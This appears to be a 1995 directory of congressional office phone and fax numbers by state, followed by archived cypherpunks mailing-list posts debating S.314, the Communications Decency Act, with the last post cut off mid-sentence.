Sen. Moseley-Braun, Carol (D)      1-202-224-2854 1-202-224-2626
Sen. Simon, Paul (D)               1-202-224-2152 1-202-224-0868

Rush, Bobby L. (D-01)              1-202-225-4372 1-202-226-0333
Reynolds, Mel (D-02)               1-202-225-0773 1-202-225-0774
Lipinski, William O. (D-03)        1-202-225-5701 1-202-225-1012
Gutierrez, Luis V. (R-04)          1-202-225-8203 1-202-225-7810
Flanagan, Mike (R-05)              1-202-225-4061 1-202-225-4064
Hyde, Henry J. (R-06)              1-202-225-4561 1-202-226-1240
Collins, Cardiss (D-07)            1-202-225-5006 1-202-225-8396
Crane, Philip M. (R-08)            1-202-225-3711 1-202-225-7830
Yates, Sidney R. (D-09)            1-202-225-2111 1-202-225-3493
Porter, John E. (R-10)             1-202-225-4835 1-202-225-0157
Weller, Gerald (R-11)              1-202-225-3635 1-202-225-4447
Costello, Jerry F. (D-12)          1-202-225-5661 1-202-225-0285
Fawell, Harris W. (R-13)           1-202-225-3515 1-202-225-9420
Hastert, J. Dennis (R-14)          1-202-225-2976 1-202-225-0697
Ewing, Thomas (R-15)               1-202-225-2371 1-202-225-8071
Manzullo, Donald (R-16)            1-202-225-5676 1-202-225-5284
Evans, Lane (D-17)                 1-202-225-5905 1-202-225-5396
LaHood, Ray (R-18)                 1-202-225-6201 1-202-225-9461
Poshard, Glendal W. (D-19)         1-202-225-5201 1-202-225-1541
Durbin, Richard J. (D-20)          1-202-225-5271 1-202-225-0170


INDIANA
Member                             Phone          Fax Number

Sen. Coats, Daniel R. (R)          1-202-224-5623 1-202-224-8964
Sen. Lugar, Richard G. (R)         1-202-224-4814 1-202-224-7877

Visclosky, Peter J. (D-01)         1-202-225-2461 1-202-225-2493
Mcintosh, David (D-02)             1-202-225-3021 1-202-225-8140
Roemer, Timothy (D-03)             1-202-225-3915 1-202-225-6798
Souder, Mark (R-04)                1-202-225-4436 1-202-225-8810
Buyer, Steve (D-05)                1-202-225-5037
Burton, Daniel (R-06)              1-202-225-2276 1-202-225-0016
Myers, John T. (R-07)              1-202-225-5805 1-202-225-1649
Hostettler, John (R-08)            1-202-225-4636 1-202-225-4688
Hamilton, Lee (D-09)               1-202-225-5315 1-202-225-1101
Jacobs Jr., Andrew (D-10)          1-202-225-4011 1-202-226-4093


KANSAS
Member                             Phone          Fax Number

Sen. Kassebaum, Nancy L. (R)       1-202-224-4774 1-202-224-3514
Sen. Dole, Robert (R)              1-202-224-6521 1-202-224-8952

Roberts, Pat (R-01)                1-202-225-2715 1-202-225-5375
Brownback, Sam (R-02)              1-202-225-6601 1-202-225-1445
Meyers, Jan (R-03)                 1-202-225-2865 1-202-225-0554
Tiahrt, Todd (R-04)                1-202-225-6216 1-202-225-5398


KENTUCKY
Member                             Phone          Fax Number

Sen. McConnell, Mitch (R)          1-202-224-2541 1-202-224-2499
Sen. Ford, Wendell H. (D)          1-202-224-4343 1-202-224-0046

Whitfield, Edward (R-01)           1-202-225-3115 1-202-225-2169
Lewis, Ron (R-02)                  1-202-225-3501
Ward, Mike (R-03)                  1-202-225-5401
Bunning, James (R-04)              1-202-225-3465 1-202-225-0003
Rogers, Harold (R-05)              1-202-225-4601 1-202-225-0940
Baesler, Scotty (D-06)             1-202-225-4706 1-202-225-2122


LOUISIANA
Member                             Phone          Fax Number

Sen. Johnston, J. Bennett (D)      1-202-224-5824 1-202-224-2952
Sen. Breaux, John B. (D)           1-202-224-4623 1-202-224-2435

Livingston, Robert (R-01)          1-202-225-3015 1-202-225-0739
Jefferson, William (D-02)          1-202-225-6636 1-202-225-1988
Tauzin, W. J. (Billy) (D-03)       1-202-225-4031 1-202-225-0563
Fields, Cleo (D-04)                1-202-225-8490 1-202-225-8959
McCrery, James (R-05)              1-202-225-2777 1-202-225-8039
Baker, Richard H. (R-06)           1-202-225-3901 1-202-225-7313
Hayes, James A. (D-07)             1-202-225-2031 1-202-225-1175


MASSACHUSETTS
Member                             Phone          Fax Number

Sen. Kennedy, Edward M. (D)        1-202-224-4543 1-202-224-2417
Sen. Kerry, John F. (D)            1-202-224-2742 1-202-224-8525

Olver, John W. (D-01)              1-202-225-5335 1-202-226-1224
Neal, Richard E. (D-02)            1-202-225-5601 1-202-225-8112
Blute, Peter I. (R-03)             1-202-225-6101 1-202-225-2217
Frank, Barney (D-04)               1-202-225-5931 1-202-225-0182
Meehan, Martin T. (D-05)           1-202-225-3411 1-202-226-0771
Torkildsen, Peter G. (R-06)        1-202-225-8020 1-202-225-8037
Markey, Edward J. (D-07)           1-202-225-2836 1-202-225-8689
Kennedy II, Joseph P. (D-08)       1-202-225-5111 1-202-225-9322
Moakley, John Joseph (D-09)        1-202-225-8273 1-202-225-7304
Studds, Gerry E. (D-10)            1-202-225-3111 1-202-225-2212



MARYLAND
Member                             Phone          Fax Number

Sen. Mikulski, Barbara A. (D)      1-202-224-4654 1-202-224-8858
Sen. Sarbanes, Paul S. (D)         1-202-224-4524 1-202-224-1651

Gilchrest, Wayne T. (R-01)         1-202-225-5311 1-202-225-0254
Ehrlich, Bob (R-02)                1-202-225-3061 1-202-225-4251
Cardin, Benjamin L. (D-03)         1-202-225-4016 1-202-225-9219
Wynn, Albert R. (D-04)             1-202-225-8699 1-202-225-8714
Hoyer, Steny H. (D-05)             1-202-225-4131 1-202-225-4300
Bartlett, Roscoe G. (R-06)         1-202-225-2721 1-202-225-2193
Mfume, Kweisi (D-07)               1-202-225-4741 1-202-225-3178
Morella, Constance (R-08)          1-202-225-5341 1-202-225-1389


MAINE
Member                             Phone          Fax Number

Sen. Snowe, Olympia (R)            1-202-224-5344 1-202-224-6853
Sen. Cohen, William S. (R)         1-202-224-2523 1-202-224-2693

Longley, James (R-01)              1-202-225-6116 1-202-225-9065
Baldacci, John (D-02)              1-202-225-6306 1-202-225-8297


MICHIGAN
Member                             Phone          Fax Number

Sen. Levin, Carl (D)               1-202-224-6221
Sen. Abraham, Spencer (R)          1-202-224-4822 1-202-224-8834

Stupak, Bart (D-01)                1-202-225-4735 1-202-225-4744
Hoekstra, Peter (R-02)             1-202-225-4401 1-202-226-0779
Ehlers, Vernon (R-03)              1-202-225-3831 1-202-225-5144
Camp, David Lee (R-04)             1-202-225-3561 1-202-225-9679
Barcia, James A. (D-05)            1-202-225-8171 1-202-225-2168
Upton, Frederick S. (R-06)         1-202-225-3761 1-202-225-4986
Smith, Nick (R-07)                 1-202-225-6276 1-202-225-6281
Chrysler, Dick (R-08)              1-202-225-4872 1-202-225-1260
Kildee, Dale E. (D-09)             1-202-225-3611 1-202-225-6393
Bonior, David E. (D-10)            1-202-225-2106 1-202-226-1169
Knollenberg, Joe (R-11)            1-202-225-5802 1-202-226-2356
Levin, Sander M. (D-12)            1-202-225-4961 1-202-226-1033
Rivers, Lynn (D-13)                1-202-225-6261 1-202-225-0489
Conyers Jr., John (D-14)           1-202-225-5126 1-202-225-0072
Collins, Barbara (D-15)            1-202-225-2261 1-202-225-6645
Dingell, John D. (D-16)            1-202-225-4071 1-202-225-7426


MINNESOTA
Member                             Phone          Fax Number

Sen. Grams, Rod (R)                1-202-224-3244 1-202-228-0956
Sen. Wellstone, Paul (D)           1-202-224-5641 1-202-224-8438

Gutknecht, Gil (R-01)              1-202-225-2472 1-202-225-0051
Minge, David (D-02)                1-202-225-2331 1-202-226-0836
Ramstad, James M. (R-03)           1-202-225-2871 1-202-225-6351
Vento, Bruce F. (D-04)             1-202-225-6631 1-202-225-1968
Sabo, Martin Olav (D-05)           1-202-225-4755 1-202-225-4886
Luther, William (D-06)             1-202-225-2271 1-202-225-9802
Peterson, Collin C. (D-07)         1-202-225-2165 1-202-225-1593
Oberstar, James L. (D-08)          1-202-225-6211 1-202-225-0699


MISSOURI
Member                             Phone          Fax Number

Sen. Bond, Christopher S. (R)      1-202-224-5721 1-202-224-8149
Sen. Ashcroft, John (R)            1-202-224-6154 1-202-224-7615

Clay, William L. (D-01)            1-202-225-2406 1-202-225-1725
Talent, James M. (R-02)            1-202-225-2561 1-202-225-2563
Gephardt, Richard A. (D-03)        1-202-225-2671 1-202-225-7452
Skelton, Ike (D-04)                1-202-225-2876 1-202-225-2695
McCarthy, Karen (D-05)             1-202-225-4535 1-202-225-5990
Danner, Pat (D-06)                 1-202-225-7041 1-202-225-8221
Hancock, Melton D. (R-07)          1-202-225-6536 1-202-225-7700
Emerson, Bill (R-08)               1-202-225-4404 1-202-225-9621
Volkmer, Harold L. (D-09)          1-202-225-2956 1-202-225-7834


MISSISSIPPI
Member                             Phone          Fax Number

Sen. Cochran, Thad (R)             1-202-224-5054 1-202-224-3576
Sen. Lott, Trent (R)               1-202-224-6253 1-202-224-2262

Wicker, Roger (R-01)               1-202-225-4306 1-202-225-4328
Thompson, Bennie (D-02)            1-202-225-5876 1-202-225-5898
Montgomery, G. V. (D-03)           1-202-225-5031 1-202-225-3375
Parker, Mike (D-04)                1-202-225-5865 1-202-225-5886
Taylor, Gene (D-05)                1-202-225-5772 1-202-225-7074


MONTANA
Member                             Phone          Fax Number

Sen. Burns, Conrad R. (R)          1-202-224-2644 1-202-224-8594
Sen. Baucus, Max (D)               1-202-224-2651

Williams, Pat (D-AL)               1-202-225-3211 1-202-226-0244


NORTH CAROLINA
Member                             Phone          Fax Number

Sen. Helms, Jesse (R)              1-202-224-6342 1-202-224-7588
Sen. Faircloth, Lauch (R)          1-202-224-3154 1-202-224-7406

Clayton, Eva (D-01)                1-202-225-3101 1-202-225-3354
Funderburk, Dave (R-02)            1-202-225-4531 1-202-225-1539
Jones, Walter (R-03)               1-202-225-3415 1-202-225-0666
Heineman, F. (R-04)                1-202-225-1784 1-202-225-6314
Burr, Richard (R-05)               1-202-225-2071 1-202-225-4060
Coble, Howard (R-06)               1-202-225-3065 1-202-225-8611
Rose, Charles (D-07)               1-202-225-2731 1-202-225-2470
Hefner, Bill (D-08)                1-202-225-3715 1-202-225-4036
Myrick, Sue (R-09)                 1-202-225-1976 1-202-225-8995
Ballenger, Cass (R-10)             1-202-225-2576 1-202-225-0316
Taylor, Charles Hart (R-11)        1-202-225-6401 1-202-251-0794
Watt, Melvin (D-12)                1-202-225-1510 1-202-225-1512


NORTH DAKOTA
Member                             Phone          Fax Number

Sen. Dorgan, Byron L. (D)          1-202-225-2611 1-202-225-9436
Sen. Conrad, Kent (D)              1-202-224-2043 1-202-224-7776

Pomeroy, Earl (D-AL)               1-202-225-2611 1-202-226-0893


NEBRASKA
Member                             Phone          Fax Number

Sen. Exon, J. James (D)            1-202-224-4224 1-202-224-5213
Sen. Kerrey, Joseph R. (D)         1-202-224-6551 1-202-224-7645

Bereuter, Douglas (R-01)           1-202-225-4806 1-202-226-1148
Christensen, Jon (R-02)            1-202-225-4155 1-202-225-4684
Barrett, William E. (R-03)         1-202-225-6435 1-202-225-0207


NEW HAMPSHIRE
Member                             Phone          Fax Number

Sen. Gregg, Judd (R)               1-202-224-3324 1-202-224-4952
Sen. Smith, Robert (R)             1-202-224-2841 1-202-224-1353

Zeliff Jr., William (R-01)         1-202-225-5456 1-202-225-4370
Bass, Charles (D-02)               1-202-225-5206 1-202-225-0046


NEW JERSEY
Member                             Phone          Fax Number

Sen. Lautenberg, Frank R. (D)      1-202-224-4744 1-202-224-9707
Sen. Bradley, William (D)          1-202-224-3224 1-202-224-8567

Andrews, Robert E. (D-01)          1-202-225-6501 1-202-225-6583
LoBiondo, Frank (R-02)             1-202-225-6572 1-202-226-1108
Saxton, Jim (R-03)                 1-202-225-4765 1-202-225-0778
Smith, Christopher (R-04)          1-202-225-3765 1-202-225-7768
Roukema, Marge (R-05)              1-202-225-4465 1-202-225-9048
Pallone Jr., Frank (D-06)          1-202-225-4671 1-202-225-9665
Franks, Bob (R-07)                 1-202-225-5361 1-202-225-9460
Martini, Bill (R-08)               1-202-225-5751 1-202-226-2273
Torricelli, Robert (D-09)          1-202-224-5061 1-202-225-0843
Payne, Donald M. (D-10)            1-202-225-3436 1-202-225-4160
Frelinghuysen, Rodney (R-11)       1-202-225-5034 1-202-225-0658
Zimmer, Richard A. (R-12)          1-202-225-5801 1-202-225-9181
Menendez, Robert (D-13)            1-202-225-7919 1-202-226-0792


NEW MEXICO
Member                             Phone          Fax Number

Sen. Bingaman, Jeff (D)            1-202-224-5521 1-202-224-2852
Sen. Domenici, Pete V. (R)         1-202-224-6621 1-202-224-7371

Schiff, Steven H. (R-01)           1-202-225-6316 1-202-225-4975
Skeen, Joseph (R-02)               1-202-225-2365 1-202-225-9599
Richardson, William (D-03)         1-202-225-6190 1-202-225-1950

NEVADA
Member                             Phone          Fax Number

Sen. Reid, Harry (D)               1-202-224-3542 1-202-224-7327
Sen. Bryan, Richard H. (D)         1-202-224-6244 1-202-224-1867
Ensign, John (R-01)                1-202-225-5965 1-202-225-8808
Vucanovich, Barbara (R-02)         1-202-225-6155 1-202-225-2319


NEW YORK
Member                             Phone          Fax Number

Sen. D'Amato, Alfonse M. (R)       1-202-224-6542 1-202-224-5871
Sen. Moynihan, Daniel P. (D)       1-202-224-4451 1-202-224-9293

Forbes, Michael (R-01)             1-202-225-3826 1-202-225-0776
Lazio, Rick A. (R-02)              1-202-225-3335 1-202-225-4669
King, Peter T. (R-03)              1-202-225-7896 1-202-226-2279
Frisa, Danial (R-04)               1-202-225-5516 1-202-225-4672
Ackerman, Gary L. (D-05)           1-202-225-2601 1-202-225-1589
Flake, Floyd H. (D-06)             1-202-225-3461 1-202-226-4169
Manton, Thomas J. (D-07)           1-202-225-3965 1-202-225-1909
Nadler, Jerrold (D-08)             1-202-225-5635 1-202-225-6923
Schumer, Charles E. (D-09)         1-202-225-6616 1-202-225-4183
Towns, Edolphus (D-10)             1-202-225-5936 1-202-225-1018
Owens, Major R. (D-11)             1-202-225-6231 1-202-226-0112
Velazquez, Nydia M. (D-12)         1-202-225-2361 1-202-226-0327
Molinari, Susan (R-13)             1-202-225-3371 1-202-226-1272
Maloney, Carolyn B. (D-14)         1-202-225-7944 1-202-225-4709
Rangel, Charles B. (D-15)          1-202-225-4365 1-202-225-0816
Serrano, Jose E. (D-16)            1-202-225-4361 1-202-225-6001
Engel, Eliot L. (D-17)             1-202-225-2464 1-202-225-5513
Lowey, Nita M. (D-18)              1-202-225-6506 1-202-225-0546
Kelly, Sue (R-19)                  1-202-225-5441 1-202-225-0962
Gilman, Benjamin A. (R-20)         1-202-225-3776 1-202-225-2541
McNulty, Michael R. (D-21)         1-202-225-5076 1-202-225-5077
Solomon, Gerald B. (R-22)          1-202-225-5614 1-202-225-1168
Boehlert, Sherwood (R-23)          1-202-225-3665 1-202-225-1891
McHugh, John M. (R-24)             1-202-225-4611 1-202-226-0621
Walsh, James T. (R-25)             1-202-225-3701 1-202-225-4042
Hinchey, Maurice D. (D-26)         1-202-225-6335 1-202-226-0774
Paxon, Bill (R-27)                 1-202-225-5265 1-202-225-5910
Slaughter, Louise M. (D-28)        1-202-225-3615 1-202-225-7822
LaFalce, John J. (D-29)            1-202-225-3231 1-202-225-8693
Quinn, Jack (R-30)                 1-202-225-3306 1-202-226-0347
Houghton, Amory (R-31)             1-202-225-3161 1-202-225-5574


OHIO
Member                             Phone          Fax Number

Sen. DeWine, Mike (R)              1-202-224-2315 1-202-224-6519
Sen. Glenn, John (D)               1-202-224-3353 1-202-224-7983

Chabot, Steve (R-01)               1-202-225-2216 1-202-225-4732
Portman, Rob (R-02)
Hall, Tony P. (D-03)               1-202-225-6465 1-202-225-6766
Oxley, Michael G. (R-04)           1-202-225-2676 1-202-226-1160
Gillmor, Paul E. (R-05)            1-202-225-6405 1-202-225-1985
Cremeans, Frank (R-06)             1-202-225-5705 1-202-226-0331
Hobson, David L. (R-07)            1-202-225-4324 1-202-225-1984
Boehner, John Andrew (R-08)        1-202-225-6205 1-202-225-0704
Kaptur, Marcy (D-09)               1-202-225-4146 1-202-225-7711
Hoke, Martin R. (R-10)             1-202-225-5871 1-202-226-0994
Stokes, Louis (D-11)               1-202-225-7032 1-202-225-1339
Kasich, John R. (R-12)             1-202-225-5355
Brown, Sherrod (D-13)              1-202-225-3401 1-202-225-2266
Sawyer, Thomas C. (D-14)           1-202-225-5231 1-202-225-5278
Pryce, Deborah (R-15)              1-202-225-2015 1-202-226-0986
Regula, Ralph (R-16)               1-202-225-3876 1-202-225-3059
Traficant Jr., James (D-17)        1-202-225-5261 1-202-225-3719
Ney, Bob (R-18)                    1-202-225-6265 1-202-225-9065
LaTourette, Steve (R-19)           1-202-225-5731 1-202-225-9114


OKLAHOMA
Member                             Phone          Fax Number

Sen. Inhofe, James (R)             1-202-224-4721
Sen. Nickles, Donald (R)           1-202-224-5754 1-202-224-6008

Largent, Steve (R-01)              1-202-225-2211 1-202-225-9187
CoBurn, Tom (R-02)                 1-202-225-2701 1-202-225-2796
Brewster, Billy Kent (D-03)        1-202-225-4565 1-202-225-9029
Watts, J.C. (R-04)                 1-202-225-6165 1-202-225-9746
Istook, Ernest Jim (R-05)          1-202-225-2132 1-202-226-1463
Lucas, Frank (R-06)                1-202-225-5565 1-202-225-8698


OREGON
Member                             Phone          Fax Number

Sen. Packwood, Bob (R)             1-202-224-5244 1-202-228-3576
Sen. Hatfield, Mark O. (R)         1-202-224-3753 1-202-224-0276

Furse, Elizabeth (D-01)            1-202-225-0855 1-202-225-9497
Cooley, Wes (R-02)                 1-202-225-6730 1-202-225-3129
Wyden, Ronald (D-03)               1-202-225-4811 1-202-225-8941
DeFazio, Peter A. (D-04)           1-202-225-6416 1-202-225-0694
Webber, Catherine (D-05)           1-202-225-5711 1-202-225-9477


PENNSYSLVANIA
Member                             Phone          Fax Number

Sen. Specter, Arlen (R)            1-202-224-4254 1-202-224-1893
Sen. Santorum, Rick (R)            1-202-224-6324 1-202-224-4161

Foglietta, Thomas M. (D-01)        1-202-225-4731 1-202-225-0088
Fattah, Chaka (D-02)               1-202-225-4001 1-202-225-7362
Borski, Robert A. (D-03)           1-202-225-8251 1-202-225-4628
Klink, Ron (D-04)                  1-202-225-2565 1-202-226-2274
Clinger Jr., William (R-05)        1-202-225-5121 1-202-225-4681
Holden, Tim (D-06)                 1-202-225-5546 1-202-226-0996
Weldon, Curt (R-07)                1-202-225-2011 1-202-225-8137
Greenwood, Jim (R-08)              1-202-225-4276 1-202-225-9511
Shuster, Bud (R-09)                1-202-225-2431 1-202-225-2486
McDade, Joseph M. (R-10)           1-202-225-3731 1-202-225-9594
Kanjorski, Paul E. (D-11)          1-202-225-6511 1-202-225-9024
Murtha, John P. (D-12)             1-202-225-2065 1-202-225-5709
Fox, Jon (R-13)                    1-202-225-6111 1-202-226-0798
Coyne, William J. (D-14)           1-202-225-2301 1-202-225-1844
McHale, Paul (D-15)                1-202-225-6411 1-202-225-5320
Walker, Robert S. (R-16)           1-202-225-2411 1-202-225-2484
Gekas, George W. (R-17)            1-202-225-4315 1-202-225-8440
Doyle, Michael (D-18)              1-202-225-2135 1-202-225-7747
Goodling, William F. (R-19)        1-202-225-5836 1-202-226-1000
Mascara, Frank (D-20)              1-202-225-4665 1-202-225-4772
English, Philip (R-21)             1-202-225-5406 1-202-225-1081


PUERTO RICO
Member                             Phone          Fax Number

Del. Romero-Barcelo, Carlos (D-AL) 1-202-225-2615 1-202-225-2154


RHODE ISLAND
Member                             Phone          Fax Number

Sen. Pell, Claiborne (D)           1-202-224-4642 1-202-224-4680
Sen. Chafee, John H. (R)           1-202-224-2921

Kennedy, Patrick (D-01)            1-202-225-4911 1-202-225-4417
Reed, John F. (D-02)               1-202-225-2735 1-202-225-9580


AMERICAN SAMOA
Member                             Phone          Fax Number

Del. Faleomavaega, Eni F.H. (D-AL) 1-202-225-8577 1-202-225-8757


SOUTH CAROLINA
Member                             Phone          Fax Number

Sen. Hollings, Ernest F. (D)       1-202-224-6121 1-202-224-4293
Sen. Thurmond, Strom (R)           1-202-224-5972 1-202-224-1300

Sanford, Mark (R-01)               1-202-225-3176 1-202-225-4340
Spence, Floyd (R-02)               1-202-225-2452 1-202-225-2455
Graham, Lindsey (R-03)             1-202-225-5301 1-202-225-5383
Inglis, Bob (R-04)                 1-202-225-6030 1-202-226-1177
Spratt Jr., John M. (D-05)         1-202-225-5501 1-202-225-0464
Clyburn, James E. (D-06)           1-202-225-3315 1-202-225-2302


SOUTH DAKOTA
Member                             Phone          Fax Number

Sen. Pressler, Larry (R)           1-202-224-5842 1-202-224-1630
Sen. Daschle, Thomas A. (D)        1-202-224-2321 1-202-224-2047

Johnson, Timothy P. (D-AL)         1-202-225-2801 1-202-225-2427


TENNESSEE
Member                             Phone          Fax Number

Sen. Thompson, Fred (R)            1-202-224-1036 1-202-228-3679
Sen. Frist, Bill (R)               1-202-224-3344 1-202-224-8062

Quillen, James H. (R-01)           1-202-225-6356 1-202-225-7812
Duncan Jr., John J. (R-02)         1-202-225-5435 1-202-225-6440
Wamp, Zach (R-03)                  1-202-225-3271 1-202-225-6974
Hilleary, Van (R-04)               1-202-225-6831 1-202-225-4520
Clement, Robert (D-05)             1-202-225-4311 1-202-226-1035
Gordon, Bart (D-06)                1-202-225-4231 1-202-225-6887
Bryant, Ed (R-07)                  1-202-225-2811 1-202-225-2814
Tanner, John S. (D-08)             1-202-225-4714 1-202-225-1765
Ford, Harold E. (D-09)             1-202-225-3265 1-202-225-9215


TEXAS
Member                             Phone          Fax Number

Sen. Hutchison, Kay Bailey (R)     1-202-224-5922 1-202-224-0776
Sen. Gramm, Phil (R)               1-202-224-2934 1-202-228-2856

Chapman, Jim (D-01)                1-202-225-3035 1-202-225-7265
Wilson, Charles (D-02)             1-202-225-2401 1-202-225-1764
Johnson, Sam (R-03)                1-202-225-4201 1-202-225-1485
Hall, Ralph M. (D-04)              1-202-225-6673 1-202-225-3332
Bryant, John (D-05)                1-202-225-2231 1-202-225-9721
Barton, Joseph (R-06)              1-202-225-2002 1-202-225-3052
Archer, William (R-07)             1-202-225-2571 1-202-225-4381
Fields, Jack (R-08)                1-202-225-4901 1-202-225-2772
Stockman, Steve (R-09)             1-202-225-6565 1-202-225-1584
Doggett, Lloyd (D-10)              1-202-225-4865 1-202-225-3018
Edwards, Chet (D-11)               1-202-225-6105 1-202-225-0350
Geren, Peter (D-12)                1-202-225-5071 1-202-225-2786
Thornberry, Williams (R-13)        1-202-225-3706 1-202-225-6142
Laughlin, Gregory H. (D-14)        1-202-225-2831 1-202-225-1108
de la Garza, E. Kika (D-15)        1-202-225-2531 1-202-225-2534
Coleman, Ronald D. (D-16)          1-202-225-4831
Stenholm, Charles W. (D-17)        1-202-225-6605 1-202-225-2234
Lee, Sheila (D-18)                 1-202-225-3816 1-202-225-6186
Combest, Larry (R-19)              1-202-225-4005 1-202-225-9615
Gonzalez, Henry B. (D-20)          1-202-225-3236 1-202-225-1915
Smith, Lamar S. (R-21)             1-202-225-4236 1-202-225-8628
DeLay, Thomas (R-22)               1-202-225-5951 1-202-225-5241
Bonilla, Henry (R-23)              1-202-225-4511 1-202-225-2237
Frost, Martin (D-24)               1-202-225-3605 1-202-225-4951
Bentsen, Ken (D-25)                1-202-255-7508 1-202-225-4210
Armey, Richard K. (R-26)           1-202-225-7772 1-202-225-7614
Ortiz, Solomon P. (D-27)           1-202-225-7742 1-202-226-1134
Tejeda, Frank (D-28)               1-202-225-1640 1-202-225-1641
Green, Gene (D-29)                 1-202-225-1688 1-202-225-9903
Johnson, Eddie Bernice (D-30)      1-202-225-8885 1-202-226-1477


UTAH
Member                             Phone          Fax Number

Sen. Hatch, Orrin G. (R)           1-202-224-5251 1-202-224-6331
Sen. Bennett, Robert (R)           1-202-224-5444 1-202-224-6717

Hansen, James V. (R-01)            1-202-225-0453 1-202-225-5857
Waldholtz, Enid (R-02)             1-202-225-3011 1-202-226-0354
Orton, William H. (D-03)           1-202-225-7751 1-202-226-1223


VIRGINIA
Member                             Phone          Fax Number

Sen. Robb, Charles S. (D)          1-202-224-4024 1-202-224-8689
Sen. Warner, John W. (R)           1-202-224-2023 1-202-224-6295

Bateman, Herbert H. (R-01)         1-202-225-4261 1-202-225-4382
Pickett, Owen B. (D-02)            1-202-225-4215 1-202-225-4218
Scott, Robert C. (D-03)            1-202-225-8351 1-202-225-3854
Sisisky, Norman (D-04)             1-202-225-6365 1-202-226-1170
Payne Jr., Lewis F. (D-05)         1-202-225-4711 1-202-226-1147
Goodlatte, Robert W. (R-06)        1-202-225-5431 1-202-225-9681
Bliley Jr., Thomas J. (R-07)       1-202-225-2815 1-202-225-0011
Moran Jr., James P. (D-08)         1-202-225-4376 1-202-225-0017
Boucher, Rick (D-09)               1-202-225-3861 1-202-225-0442
Wolf, Frank R. (R-10)              1-202-225-5136 1-202-225-0437
Davis III, Thomas (R-11)           1-202-225-1492 1-202-225-2274


VIRGIN ISLANDS
Member                             Phone          Fax Number

Del. de Lugo, Ron (D-AL)           1-202-225-1790 1-202-225-9392


VERMONT
Member                             Phone          Fax Number

Sen. Jeffords, James M. (R)        1-202-224-5141 1-202-224-8330
Sen. Leahy, Patrick J. (D)         1-202-224-4242 1-202-224-3595

Sanders, Bernard (I-AL)            1-202-225-4115 1-202-225-6790


WASHINGTON
Member                             Phone          Fax Number

Sen. Murray, Patty (D)             1-202-224-2621 1-202-224-0238
Sen. Gorton, Slade (R)             1-202-224-3441 1-202-224-9393

White, Rick (R-01)                 1-202-225-6311 1-202-225-2286
Metcalf, Jack (R-02)               1-202-225-2605 1-202-225-2608
Smith, Linda (R-03)                1-202-225-3536 1-202-225-9095
Hastings, Dee (R-04)               1-202-225-5816 1-202-226-1137
Nethercutt, George (R-05)          1-202-225-2006 1-202-225-7181
Dicks, Norman D. (D-06)            1-202-225-5916 1-202-226-1176
McDermott, James A. (D-07)         1-202-225-3106 1-202-225-9212
Dunn, Jennifer (R-08)              1-202-225-7761 1-202-225-8673
Tate, Randy (R-09)                 1-202-225-8901 1-202-226-2361


WISCONSIN
Member                             Phone          Fax Number

Sen. Kohl, Herbert H. (D)          1-202-224-5653 1-202-224-9787
Sen. Feingold, Russell (D)         1-202-224-5323 1-202-224-2725

Neumann, Mark (R-01)
Klug, Scott (R-02)                 1-202-225-2906 1-202-225-6942
Gunderson, Steve (D-03)            1-202-225-5506 1-202-225-6195
Kleczka, Gerald D. (D-04)          1-202-225-4572 1-202-225-8135
Barrett, Thomas M. (D-05)          1-202-225-3571 1-202-225-2185
Petri, Thomas E. (R-06)            1-202-225-2476 1-202-225-2356
Obey, David R. (D-07)              1-202-225-3365 1-202-225-0561
Roth, Toby (R-08)                  1-202-225-5665 1-202-225-0087
Sensenbrenner, F. James (R-09)     1-202-225-5101 1-202-225-3190


WEST VIRGINIA
Member                             Phone          Fax Number

Sen. Rockefeller, John D. (D)      1-202-224-6472 1-202-224-1689
Sen. Byrd, Robert C. (D)           1-202-224-3954 1-202-224-4025

Mollohan, Alan B. (D-01)           1-202-225-4172 1-202-225-7564
Wise Jr., Robert E. (D-02)         1-202-225-2711 1-202-225-7856
Rahall II, Nick Joe (D-03)         1-202-225-3452 1-202-225-9061


WYOMING
Member                             Phone          Fax Number

Sen. Simpson, Alan K. (R)          1-202-224-3424 1-202-224-1315
Sen. Thomas, Craig (R)             1-202-224-6441 1-202-224-3230

Cubin, Barbara (R-AL)              1-202-225-2311 1-202-225-0726




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 22:41:32 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: S.314, the "Pi Bill"
In-Reply-To: <199502080547.VAA28367@netcom11.netcom.com>
Message-ID: <Pine.SV4.3.91.950208002952.25082A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Feb 1995, Timothy C. May wrote:

> Brad Huntting wrote:
> 
> > Can anyone confirm this S.314 thing?  It sounds an awful lot like
> > the "modem tax" and other urban legends.
> > 
> > 
> 
> I wrote a post to comp.org.eff.talk in which I asked if "S.314" isn't
> just the "Pi Bill," in which pi = 3.14 is mandated to be pi = 3.00.
> 
> S.314 I initially, for a minute or so, thought to be a put-on, a
> spoof. But the text lacked other signs of humor and had the trappings
> of a real bill. And then versions from reputable groups began to
> appear, so I was of course convinced it was real.
> 
> If it's a spoof, it's too cute by half.
> 
> --Tim May

I too thought it was a spoof initally. Hell, what Senator would be dumb 
enough to name a bill this way if it was real. If I were trying to pass a 
bill of this nature, it would be double-speak all of the way. But alas it 
is true...And I thought the DT bill was bad. 

Both of my congresscritters have been faxed and queried as to their 
position. I'll inform the group when they fax me back. I would urge 
others to do this. This will be unbelievably bad if we loose this one. 
The ramifications on this bill are still hammering me in the head.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 23:07:13 PST
To: cypherpunks@toad.com
Subject: Full text of S. 314
Message-ID: <Pine.SV4.3.91.950208010437.25409A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 23:24:13 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080649.BAA02589@ducie.cs.umass.edu>
Message-ID: <Pine.SV4.3.91.950208011435.25409B-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 8 Feb 1995, L. McCarthy wrote:

> The battle over "obscenity" has been fought long and hard.
> 
> "Indecency" seems a remarkably nebulous term (and, of course, ludicrously
> Victorian). I'd be interested in seeing a legal definition, and alarmed if
> there isn't one (yet).

Last I heard, the Supreme Court had never made a ruling on this. They 
